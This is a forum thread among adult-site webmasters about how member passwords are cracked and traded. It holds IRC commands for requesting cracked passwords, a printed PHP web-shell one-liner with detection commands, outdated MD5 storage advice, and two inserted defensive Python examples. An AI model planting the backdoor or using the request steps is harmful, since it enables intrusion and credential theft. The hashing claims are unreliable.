How easy is it to get a password to just about any pornsite?
Very FUCKING easy! In this thread I will attempt to get webmasters to actually do something about their BW and customer service costs. I bet you webmasters don't even realize just how many passwords are given out in a day. If you did, I am sure you would do something about it. I hear it all the time, "We actually give out passwords to 'password boards' to have them fail in a few hours and try to get people to buy based on the 401 error page and popup consoles." What you don't realize is that most people don't get passwords from fake password boards. Surfers are not stupid anymore.

First we will look at one of the oldest technologies, newsgroups. Go to your favorite reader and plug into alt.sex.passwords, a newsgroup that has been giving out passwords since before there was an internet (it used to give them out for subscription porn BBS's). Here you will see anywhere from 10's to 100's of passwords given out daily. Just request one and see how fast you get a reply.

Next we can go to the IRC. Another old technology. Get where we are going? You guessed it (maybe), Alt.Sex.Passwords again ;) . This time we go to www.mirc.com and download the latest copy. Then load it up and login to thundercity.net. Perhaps the easiest way is this command: /server irc.thundercity.net Then /join #asp Now you can make a request in this format, !request http://members.url.com/members_area (billing_company) Someone is going to crack you a password in 0 seconds to 1 hour or so. I said 0 seconds because someone might have cracked a ton of passwords for your site already. When someone does this, they usually setup a script to automatically fill your request.

Now you are thinking, "So fucking what, I have the most leet password management scripts known to man (or woman). They will block these fuckers!" Sorry, but no, they won't. Why not? Because AOL sucks balls, that is why!

You had to set it so that 3 to 5 people can use a password with the same IP and the AOL modem/ADSL users can use your service without getting blocked. "Right." you say, "But these people are giving the same passwords to multiple people every few minutes, they WILL get blocked!" Wrong, I say... If you have two systems at your work space, ask for the same password from each different machine. Someone will crack you 2 different passwords... And the other 30 people? They will get 30 different passwords... It is actually "bad etiquette" for a cracker to give the same password to 2 people within 2 hours time.

Most people who sign on to the IRC don't use proxies. In fact, IRC networks try to make it really hard to do so. So you can watch someone get one of your passwords and then see what happens in your logs. Or better yet, watch for a 1 hour period. Say 20 people ask for your site in that time frame. Then also keep track of legit users in the same time frame. GREP your logs for their IP's and see how much BW they are using. Compare it to the BW the legit users are using. Is it 20%? 25%? 50%? more? See how many passwords get blocked. Do any? If 5 do, then do the legit users cancel them or chargeback instead of getting them reactivated? Does the customer service agent make them feel like suspects (password sharing) instead of victims (password cracking)? Do they reset the password with the same password so this happens again?

OK.. now let's try a password forum. http://www.xxxhq.com/vb/index.php Here you will find passwords that people have cracked and posted. You can usually find working passwords for your favorite sites. The major problem with this method is that you are going to have upwards of a 100 people try a password at the same time. Killing it. It is common that if you post 200 passwords for a big site like [insert_your_idea_of_a_big_site_here], the passwords will die en masse. Why is this a problem?

Because it is a customer service nightmare when 200 passwords are killed in 2 hours. 1 to 5 chargebacks? 10 to 20 cancels? 5 to 30 refunds? I dunno. I don't run a program, but I am sure you see numbers somewhere near these. Resetting the remaining 150 passwords = fun? I didn't think so. I didn't write this to give GFY surfers a free ride. I wrote it to let you know that you all have problems in some form... Well, 95% of you do.

How can you fix this shit? First, use a form login. Crackers HATE form logins. Basic Authentication (the grey popup) can be cracked at speeds as high as 150,000 tries per hour. Forms are about 8,000 to 25,000. No one wants to do them. But people WILL, IF THEY HAVE TO. So you need something even better. So you need a security code. Not a run-of-the-mill one either. The numbers and letters need to mix with their backgrounds so that there is little contrast. A program named Caecus can read the run-of-the-mill ones pretty easy, but it relies on contrast to do so. Skewing the numbers and letters also helps. Now you have 1/2 of the battle won. Finding working passwords is a bitch for a cracker now.

But what about the hacker? They are still getting in and getting passwords. To combat them you need to properly create and secure passwords. #1, Make your own passwords. Do not let a user choose their password, ever. These passwords should be made out of both upper and lowercase letters and with numbers. They should be 8 characters in length. #2, NEVER store unencrypted passwords on the server. NEVER EVER! If you generate your own passwords and a hacker steals the unencrypted ones, you are screwed. #3, Store passwords in a bitchy format like MD5. MD5 passwords can be cracked at about 5,000 c/s and DES can be done at 150,000 c/s or more. Which one is the better choice? Now assuming you followed rules 1, 2 and 3 you have the other 1/2 of the problem fixed. Now even if a hacker steals your DB, they have passwords that they cannot crack.

But what if a customer forgets their password? Simple, write a script just like the one that resets your password here at GFY. Still not thinking the problem is HUGE? ( -m allows you to connect to another server without disconnecting from the current one.) /server -m mesra.kl.my.dal.net /list xxx then, /server -m mesa.az.us.undernet.org /list xxx I could go on but I think you will quickly see just how much of a pain in the ass this kind of password cracking is.

This is also a call to programmers. If you can offer solutions like the login script or password reset scripts, reply here! Offer your services. I am sure there are about 3,000 websites that need them. |
|
Quote:
No fucking doubt man. |
High times can i buy your sig for 300/month ?
|
Quote:
:pimp :pimp :pimp |
Quote:
www.arikaames.com |
For 6 posts he is really knockin out some great BS and Misinformation.
But hey it's always fun to forget everything ya know... Let's enjoy the fantasy. |
pennywize has done wonders for us.
|
HT, go back to smoking herb, you appear to be better at that than posting here.
SOS, does he have a sig yet? If so, what an embarrassing mistake by any company who would let him link up. |
Quote:
:1orglaugh :1orglaugh :1orglaugh :1orglaugh The clueless ones are always the best!!!!!!!! :thumbsup |
Anything can be cracked and hacked...
Big Whoooop Tell us something new, are you wasting any talent you have just to get into a porn site? Let us know when you can Crack IBILL to find out exactly what's going on. |
did you know if hackers got into your server, that its bad?
|
Now I know how Jesus felt...
Pretty much all who have posted are sheep. I think that is obvious. If a hacker steals your DB and cannot use the DB then you have still won. If you are too thick to realize that then you are a sheep. Example,
Code:
<coldrage> http://www.ravenriley.com/members/ sent to Dean
You can call me scum, poser or whatever you'd like. The truth is I know more than you probably ever will and for some reason that scares you more than the knowledge you'd gain by listening. |
good thing you posted a screenshot of peoples passwords being given out.... you know... because the reason you got flamed was because we didn't believe that passwords were being cracked
:thumbsup i should probably mention that i was being sarcastic |
Wow, someone actually addresses a real issue on GFY and look at the responses...
That's just sad... |
K...
Right about now I am waiting for the sales pitch... Password problems have always been a problem since day one. What you're saying is really umm... Nothing new... So what are you selling? |
Good post HT.
Fuck the haters |
I am not selling anything. Not a service. Not a device. Not a piece of software.
I am simply telling you the three things you need to be smarter and to STOP being cracked/hacked for passwords. Form with security code. Server made passwords (8 characters minimum). Stored encrypted with MD5 or something else equally hard to crack. |
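Added example (Python; not the poster's code and not from any site named in this thread) of the three rules HT gives above and in the first post: passwords generated on the server from upper, lower and digits (8 characters minimum), only hashed values stored, and a forgot-password script that issues a fresh password instead of resetting to the old one. Where the posts say MD5, this uses PBKDF2-HMAC-SHA256 with a random per-user salt as the "something else equally hard to crack"; the MemberDB class, the round count and the member names are constructed for the example.

```python
import hashlib
import hmac
import os
import secrets
import string

# Upper, lower and digits, as the post specifies for server-made passwords.
ALPHABET = string.ascii_letters + string.digits
# Assumed work factor for PBKDF2 (swapped in for the MD5 the post mentions).
PBKDF2_ROUNDS = 200_000


def generate_password(length=8):
    """Server-generated password; the user never chooses one."""
    if length < 8:
        raise ValueError("post's minimum is 8 characters")
    while True:
        pw = "".join(secrets.choice(ALPHABET) for _ in range(length))
        # Reject draws that miss a class so every issued password mixes all three.
        if (any(c.islower() for c in pw) and any(c.isupper() for c in pw)
                and any(c.isdigit() for c in pw)):
            return pw


def hash_password(password, salt=None):
    """Salted PBKDF2 record 'salthex$digesthex'; the plaintext is never stored."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return salt.hex() + "$" + digest.hex()


def verify_password(password, stored):
    """Recompute with the stored salt and compare in constant time."""
    salt_hex, digest_hex = stored.split("$", 1)
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                    bytes.fromhex(salt_hex), PBKDF2_ROUNDS)
    return hmac.compare_digest(candidate, bytes.fromhex(digest_hex))


class MemberDB:
    """Constructed in-memory stand-in for the members table (hashes only)."""

    def __init__(self):
        self._rows = {}

    def create_member(self, username):
        pw = generate_password()
        self._rows[username] = hash_password(pw)
        return pw  # shown to the customer once, then gone from the server

    def login(self, username, password):
        stored = self._rows.get(username)
        if stored is None:
            # Burn the same time for unknown users so timing does not reveal them.
            verify_password(password, hash_password(""))
            return False
        return verify_password(password, stored)

    def reset_password(self, username):
        """Forgot-password path: a new server-made password, never the old one again."""
        if username not in self._rows:
            raise KeyError(username)
        pw = generate_password()
        self._rows[username] = hash_password(pw)
        return pw

    def stored_record(self, username):
        return self._rows[username]


if __name__ == "__main__":
    db = MemberDB()
    issued = db.create_member("member0001")
    print("issued:", issued)
    print("stored:", db.stored_record("member0001"))
    print("login ok:", db.login("member0001", issued))
```

The stored record contains the salt and digest only; even with the whole table in hand an attacker has to run the full PBKDF2 cost per guess per user, which is the property the posts are after when they say a stolen DB should be useless.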
PHHhhh...
Thanks, you wasted my time... |
HightTimes I like ya already.
Ya got "That Aggression" turn it into cash:) |
all my sites are protected strictly with iprotect, server made 10 character alpha numeric passwords and encrypted on a separate server with MD5....:)
|
Code:
grep -R -i passthru ./
Example, /home/sites/website1.com /home/sites/website2.com. Run it in /home/sites so that it covers them all... If you find a script that resembles the one I posted previously, you've been hacked. |
Quote:
Well I guess that was the silver nail that was drove home in the casket, no replies for a while now. |
Backdoor scripts,
Code:
<?php passthru(getenv("HTTP_ACCEPT_LANGUAGE"));?> |
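Added example (Python; not from this thread or any site in it) that generalises the `grep -R -i passthru ./` check a few posts up: it walks a web root, looks at every PHP file, and reports only calls to a command-execution function whose arguments come from request-controlled data such as getenv() or $_GET, which is what makes the one-liner above a backdoor rather than a legitimate shell call. The sample vhost tree under a temporary directory and its file names are constructed for the example; in practice point scan_tree at /home/sites.

```python
import os
import re
import tempfile

# PHP functions that hand a string to the system shell.
EXEC_FUNCS = r"\b(?:passthru|system|exec|shell_exec|popen|proc_open)"
# Request-controlled inputs; getenv() reads CGI variables such as HTTP_ACCEPT_LANGUAGE.
TAINT_SOURCES = r"(?:getenv\s*\(|\$_(?:GET|POST|REQUEST|COOKIE|SERVER)\b)"
# A shell call whose argument list (up to the statement end) contains tainted input.
BACKDOOR_RE = re.compile(EXEC_FUNCS + r"\s*\([^;]*" + TAINT_SOURCES, re.IGNORECASE)


def scan_file(path):
    """Return (path, line_number, stripped_line) for every suspicious line."""
    findings = []
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        for lineno, line in enumerate(fh, 1):
            if BACKDOOR_RE.search(line):
                findings.append((path, lineno, line.strip()))
    return findings


def scan_tree(root, exts=(".php", ".phtml", ".inc")):
    """Recurse through every vhost under root, like running the grep from /home/sites."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(files):
            if name.lower().endswith(exts):
                findings.extend(scan_file(os.path.join(dirpath, name)))
    return findings


def build_sample_tree():
    """Constructed sample: two vhosts, one clean, one carrying the backdoor from the post."""
    root = tempfile.mkdtemp(prefix="sites_")
    clean = os.path.join(root, "website1.com", "index.php")
    dirty = os.path.join(root, "website2.com", "images", "thumb.php")
    os.makedirs(os.path.dirname(clean))
    os.makedirs(os.path.dirname(dirty))
    with open(clean, "w") as fh:
        # Uses $_GET but never reaches a shell function, so it must not be flagged.
        fh.write('<?php\n$page = (int) $_GET["p"];\necho "page $page";\n')
    with open(dirty, "w") as fh:
        fh.write('<?php passthru(getenv("HTTP_ACCEPT_LANGUAGE"));?>\n')
    return root


if __name__ == "__main__":
    sample_root = build_sample_tree()
    for path, lineno, text in scan_tree(sample_root):
        print(f"{path}:{lineno}: {text}")
```

Treat each hit as a file to read, not as proof by itself: a hit in a file the site never shipped, dropped into an images or cache directory, is the pattern the post describes, and the file's mtime and the access log for that path then tell you when it arrived and who has been calling it.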
High_times i'm just curious.. what paysite do you run ?
|
netstat -a|grep LISTEN
Is someone running an IRC botnet on your BW and server? Running a backdoor to get on later? |
grep ahh I remember cisco's protocols =)
|
HT... Most sites don't get hacked, sites like perfectgonzo didn't get hacked. The pw leaks are from brute force attacks. No protection software can stop the attacks 100%.
|
Quote:
BTW, they really like the thread tracking services since they allow the hackers to stay up to date on what you are doing to stop them. |
Quote:
I know they did get hacked. I know how they got hacked. I won't spell it out here. You can easily find it by surfing the link to their join page. Dammit... well, I gave some of it away. |
why are you more a target then anyone else?
|
Quote:
Because no webmaster wants retribution from hackers who read the story and then say, "Ohh, you thought that was cute? Wait until this..." |
Powered by vBulletin® Version 3.8.8
Copyright ©2000 - 2025, vBulletin Solutions, Inc.
©2000-, AI Media Network Inc